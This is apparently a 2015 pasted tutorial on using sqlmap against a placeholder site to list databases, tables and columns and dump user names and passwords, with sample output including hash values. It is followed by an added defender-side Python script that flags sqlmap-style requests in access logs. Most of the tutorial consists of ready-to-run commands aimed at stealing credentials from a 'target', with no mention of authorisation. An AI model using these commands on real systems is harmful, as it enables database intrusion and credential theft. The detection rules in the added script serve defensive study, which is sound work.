9r3nXPaRTa

Tutorial SQLMAP By GrenXPaRTa

May 17th, 2015
The first command we're going to use will scan the target for vulnerabilities:

sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs

Obviously we would replace the URL with our target's URL. sqlmap will now start
scanning. In some cases it will ask if you want to skip scans to save time;
we do not want to skip scans, so just type 'n'. It may also ask if you want to include
certain types of scans; we always want to say 'y'. Skipping scans is being lazy, and
sqlmap might say our target is not vulnerable because we skipped a few scans that
contained the vuln we would exploit. So never skip scans, and always include all scan
types when asked.

sqlmap will output our target's database names in a format similar to the one below.
If the list contains the "information_schema" db, then navigating through
the database should be a breeze. However, if it does not contain it, you will
end up having to brute-force your way through the database to get table names
and column names.
+-------------------+
|information_schema |
|database_name      |
|test_db            |
+-------------------+
sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --tables

This command will list the tables of the database you selected. When you select a database, you
do not want to select "information_schema": most of the data requires "root" to access, or in other
words you will need to be an admin to read the data.

+-------------------+
|products           |
|random_shit        |
|users              |
+-------------------+

Above we have an example of a table list. The primary table we are going to access is the "users"
table, so we type the following:

sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns

This command will access the columns inside the table. The output from sqlmap will look something like
the one below.

+-------------------+
|id                 |
|user_name          |
|full_name          |
|location           |
|ip_address         |
|last_name          |
|password           |
+-------------------+

Above is an example of what you will see when retrieving the columns.
The main ones we want to access are the ones that contain the username and password;
the command to access the data in the columns is below.

I find it easy to open a few new terminal windows and access the usernames and passwords at the
same time.

sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump

Now the output will be the same as the others, except with usernames:

+-------------------+
|admin              |
|user1              |
|user2              |
+-------------------+

And there are 2 outcomes for the password output:
outcome1:

+-------------------+
|admin              |
|irrandom           |
|iamhomo69          |
+-------------------+

outcome2:

+--------------------------------+
|c02b7d24a066adb747fdeb12deb21bfa|
|96e79218965eb72c92a549dd5a330112|
|f1981e4bd8a0d6d8462016d2fc6276b3|
+--------------------------------+
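
Added example (not part of the original paste): a defender-side check that flags the enumeration traffic described above in web server access logs. The log lines, IP addresses, rule names and the combined log format are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [17/May/2015:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [17/May/2015:10:00:02 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.9 - - [17/May/2015:10:00:03 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL%2Cschema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [17/May/2015:10:00:04 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL%2Ccolumn_name%20FROM%20INFORMATION_SCHEMA.COLUMNS HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, request target, User-Agent
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Each rule receives the decoded, lower-cased request target and the raw User-Agent.
RULES = {
    "sqlmap_user_agent": lambda url, ua: ua.lower().startswith("sqlmap/"),
    "information_schema": lambda url, ua: "information_schema" in url,
    "union_select": lambda url, ua: re.search(r"\bunion\b.{0,20}\bselect\b", url) is not None,
}

def scan(log_text):
    """Return {client_ip: {rule_name: hit_count}} for requests matching any rule."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, raw_url, ua = m.groups()
        # Decode twice so single and double URL-encoding both normalise.
        url = unquote_plus(unquote_plus(raw_url)).lower()
        for name, rule in RULES.items():
            if rule(url, ua):
                hits[ip][name] += 1
    return {ip: dict(rules) for ip, rules in hits.items()}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, rules)
```

The User-Agent rule only catches default settings, since that header is trivially changed; the payload rules are the ones that keep working. Fixing the injectable query with parameterized statements is what actually stops the enumeration.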